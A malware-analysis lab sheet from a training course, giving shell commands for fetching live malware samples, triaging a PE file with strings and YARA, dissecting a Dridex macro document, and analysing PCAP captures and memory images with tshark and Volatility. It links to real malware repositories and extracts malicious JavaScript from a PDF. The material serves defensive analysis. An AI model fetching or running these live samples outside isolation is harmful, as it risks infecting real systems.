- ############################
- # Download the Analysis VM #
- ############################
- https://infosecaddictsfiles.blob.core.windows.net/vms/InfoSecAddictsVM.zip
- user: infosecaddicts
- pass: infosecaddicts
- - Log in to your Ubuntu system with the username 'malware' and the password 'malware'.
- - After logging in, please open a terminal window and type the following commands:
- cd Desktop/
- - This is actual malware (remember to run it in a VM; the password to extract it is 'infected'):
- cd /home/infosecaddicts/Desktop/
- wget https://infosecaddictsfiles.blob.core.windows.net/files/malware-password-is-infected.zip --no-check-certificate
- wget https://infosecaddictsfiles.blob.core.windows.net/files/analyse_malware.py --no-check-certificate
- unzip malware-password-is-infected.zip
- infected
- file malware.exe
- mv malware.exe malware.pdf
- file malware.pdf
- mv malware.pdf malware.exe
- hexdump -n 2 -C malware.exe
- ***What is '4d 5a' or 'MZ'***
- Reference:
- http://www.garykessler.net/library/file_sigs.html
- objdump -x malware.exe
- strings malware.exe
- strings --all malware.exe | head -n 6
- strings malware.exe | grep -i dll
- strings malware.exe | grep -i library
- strings malware.exe | grep -i reg
- strings malware.exe | grep -i hkey
- strings malware.exe | grep -i hku
- - We didn't see anything like HKLM, HKCU or other registry type stuff
- strings malware.exe | grep -i irc
- strings malware.exe | grep -i join
- strings malware.exe | grep -i admin
- strings malware.exe | grep -i list
- - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
- sudo apt-get install -y python-pefile
- malware
- vi analyse_malware.py
- python analyse_malware.py malware.exe
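As an added illustration (this is not the course's analyse_malware.py, which relies on pefile), the Python 3 script below does the two checks from the steps above without any third-party module: it verifies the 'MZ' and 'PE' signatures and reads the section table, and it reproduces the `strings malware.exe | grep -i dll/hkey/irc/join` searches. The sample bytes are a constructed minimal PE image, not the lab's malware.exe.

```python
import re
import struct

# Constructed minimal PE image for offline testing (not real malware):
# a DOS header whose e_lfanew points at a PE header with two sections,
# followed by a few printable strings of the kind the lab greps for.
def build_sample():
    dos = bytearray(b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x80))  # e_lfanew lives at offset 60
    dos += b"\x00" * (0x80 - len(dos))
    # COFF header: machine=i386, 2 sections, timestamp, symtab ptr, nsyms, optional-header size, characteristics
    coff = b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x14C, 2, 0x4E0F7C7A, 0, 0, 0, 0x0102)
    sections = b""
    for name in (b".text", b".rsrc"):
        sections += name.ljust(8, b"\x00") + b"\x00" * 32  # IMAGE_SECTION_HEADER is 40 bytes
    tail = b"\x00kernel32.dll\x00JOIN #chan\x00HKEY_LOCAL_MACHINE\\Software\x00"
    return bytes(dos) + coff + sections + tail

MACHINES = {0x14C: "i386", 0x8664: "x86-64"}

def pe_triage(data):
    """Return basic PE header facts, or an 'error' key when the bytes are not a PE file."""
    if len(data) < 64 or data[:2] != b"MZ":
        return {"error": "no MZ signature"}
    e_lfanew = struct.unpack_from("<I", data, 60)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return {"error": "no PE signature at e_lfanew"}
    machine, nsec, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    sec_off = e_lfanew + 24 + opt_size  # section table follows the optional header
    names = [data[sec_off + 40 * i:sec_off + 40 * i + 8].rstrip(b"\x00").decode("ascii", "replace")
             for i in range(nsec)]
    return {"machine": MACHINES.get(machine, hex(machine)), "sections": names, "timestamp": ts}

def keyword_strings(data, keywords, minlen=4):
    """Mimic `strings file | grep -i kw`: printable runs that contain any of the keywords."""
    hits = []
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % minlen, data):
        s = m.group().decode("ascii")
        if any(k.lower() in s.lower() for k in keywords):
            hits.append(s)
    return hits

if __name__ == "__main__":
    sample = build_sample()
    print(pe_triage(sample))
    print(keyword_strings(sample, ["dll", "hkey", "irc", "join", "admin"]))
```

Because the check keys on the file's magic rather than its name, renaming the sample to .pdf (as the lab does with mv) changes nothing in the result.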
- Building a Malware Scanner
- --------------------------
- mkdir ~/Desktop/malwarescanner
- cd ~/Desktop/malwarescanner
- wget https://github.com/jonahbaron/malwarescanner/archive/master.zip
- unzip master.zip
- cd malwarescanner-master/
- python scanner.py -h
- cat strings.txt
- cat hashes.txt
- mkdir ~/Desktop/malcode
- cp ~/Desktop/malware.exe ~/Desktop/malcode
- python scanner.py -H hashes.txt -D /home/infosecaddicts/Desktop/malcode/ strings.txt
- cd ~/Desktop/
- #####################################################
- # Analyzing Macro Embedded Malware #
- # Reference: #
- # https://jon.glass/analyzes-dridex-malware-p1/ #
- #####################################################
- cp ~/Desktop/
- - Create a FREE account on:
- https://malwr.com/account/signup/
- - Grab the malware from:
- https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/
- file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
- cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
- sudo pip install olefile
- malware
- mkdir ~/Desktop/oledump
- cd ~/Desktop/oledump
- wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
- unzip oledump_V0_0_22.zip
- cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .
- mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc
- -----------------------------------------------------------------------------------------------------------------------------------
- sudo pip install olefile
- malware
- mkdir ~/Desktop/oledump
- cd ~/Desktop/oledump
- wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/064016.zip
- unzip 064016.zip
- infected
- python oledump.py 064016.doc
- python oledump.py 064016.doc -s A4 -v
- - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
- - Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'.
- python oledump.py 064016.doc -s A5 -v
- - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
- python oledump.py 064016.doc -s A3 -v
- - Look for "GVhkjbjv" and you should see:
- - Take that long blob that starts with 636D and finishes with 653B and paste it in:
- http://www.rapidtables.com/convert/number/hex-to-ascii.htm
- ##############
- # Yara Ninja #
- ##############
- sudo apt-get remove -y yara
- malware
- wget https://github.com/plusvic/yara/archive/v3.4.0.zip
- sudo apt-get -y install libtool
- malware
- unzip v3.4.0.zip
- cd yara-3.4.0
- ./bootstrap.sh
- ./configure
- make
- sudo make install
- malware
- yara -v
- cd ..
- wget https://github.com/Yara-Rules/rules/archive/master.zip
- unzip master.zip
- cd ~/Desktop
- yara rules-master/packer.yar malcode/malware.exe
- Places to get more Yara rules:
- ------------------------------
- https://malwareconfig.com/static/yaraRules/
- https://github.com/kevthehermit/YaraRules
- https://github.com/VectraThreatLab/reyara
- Yara rule sorting script:
- -------------------------
- https://github.com/mkayoh/yarasorter
- cd ~/Desktop/rules-master
- for i in $( ls *.yar --hide=master.yar ); do echo include \"$i\";done > master.yar
- cd ~/Desktop/
- yara rules-master/master.yar malcode/malware.exe
- Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
- http://derekmorton.name/files/malware_12-14-12.sql.bz2
- Malware Repositories:
- http://malshare.com/index.php
- http://www.malwareblacklist.com/
- http://www.virusign.com/
- http://virusshare.com/
- http://www.tekdefense.com/downloads/malware-samples/
- ###############################
- # Creating a Malware Database #
- ###############################
- Creating a malware database (sqlite)
- ------------------------------------
- sudo apt-get install -y python-simplejson python-simplejson-dbg
- malware
- wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
- wget https://infosecaddictsfiles.blob.core.windows.net/files/malware-password-is-infected.zip
- unzip malware-password-is-infected.zip
- infected
- python avsubmit.py --init
- python avsubmit.py -f malware.exe -e
- Creating a malware database (mysql)
- -----------------------------------
- - Step 1: Installing MySQL database
- - Run the following command in the terminal:
- sudo apt-get install mysql-server
- malware
- - Step 2: Installing Python MySQLdb module
- - Run the following command in the terminal:
- sudo apt-get build-dep python-mysqldb
- malware
- sudo apt-get install python-mysqldb
- malware
- Step 3: Logging in
- Run the following command in the terminal:
- mysql -u root -p (set a password of 'malware')
- - Then create one database by running following command:
- create database malware;
- exit;
- wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
- vi mal_to_db.py (fill in database connection information)
- python mal_to_db.py -i
- ------- check it to see if the files table was created ------
- mysql -u root -p
- malware
- show databases;
- use malware;
- show tables;
- describe files;
- exit;
- ---------------------------------
- - Now add the malicious file to the DB
- python mal_to_db.py -f malware.exe -u
- - Now check to see if it is in the DB
- mysql -u root -p
- malware
- mysql> use malware;
- select id,md5,sha1,sha256,time FROM files;
- mysql> quit;
- #################
- # PCAP Analysis #
- #################
- cd /home/infosecaddicts/Desktop/Browser\ Forensics
- ls | grep pcap
- perl chaosreader.pl suspicious-time.pcap
- firefox index.html
- cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
- cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
- sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
- malware
- for i in session_00[0-9]*.www.html; do srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
- #############################
- # PCAP Analysis with tshark #
- #############################
- tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
- tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
- tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'
- tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq
- tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq
- tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq
- tshark -r suspicious-time.pcap -qz ip_hosts,tree
- tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
- tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
- whois rapidshare.com.eyu32.ru
- whois sploitme.com.cn
- tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
- tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
- tshark -r suspicious-time.pcap -qz http_req,tree
- tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
- tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
- ######################################
- # PCAP Analysis with forensicPCAP.py #
- ######################################
- cd ~/Desktop
- wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
- sudo easy_install cmd2
- malware
- python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
- ForPCAP >>> help
- Prints stats about PCAP
- ForPCAP >>> stat
- Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
- ForPCAP >>> dns
- ForPCAP >>> show
- Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
- ForPCAP >>> dstports
- ForPCAP >>> show
- Prints the number of ip source and store them.
- ForPCAP >>> ipsrc
- ForPCAP >>> show
- Prints the number of web's requests and store them
- ForPCAP >>> web
- ForPCAP >>> show
- Prints the number of mail's requests and store them
- ForPCAP >>> mail
- ForPCAP >>> show
- ###################
- # Memory Analysis #
- ###################
- cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility
- python volatility
- python volatility pslist -f ../hn_forensics.vmem
- python volatility connscan2 -f ../hn_forensics.vmem
- python volatility memdmp -p 888 -f ../hn_forensics.vmem
- python volatility memdmp -p 1752 -f ../hn_forensics.vmem
- ***Takes a few min***
- strings 1752.dmp | grep "^http://" | sort | uniq
- strings 1752.dmp | grep "Ahttps://" | uniq -u
- cd ..
- foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
- cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
- cat audit.txt
- cd pdf
- ls
- grep -i javascript *.pdf
- cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
- wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
- unzip pdf-parser_V0_6_4.zip
- python pdf-parser.py -s javascript --raw 00600328.pdf
- python pdf-parser.py --object 11 00600328.pdf
- python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js
- cat malicious.js
- *****Sorry - no time to cover javascript de-obfuscation today*****
- cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility/
- python volatility files -f ../hn_forensics.vmem > files
- cat files | less
- python volatility malfind -f ../hn_forensics.vmem -d out
- ls out/
- python volatility hivescan -f ../hn_forensics.vmem
- python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
- for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done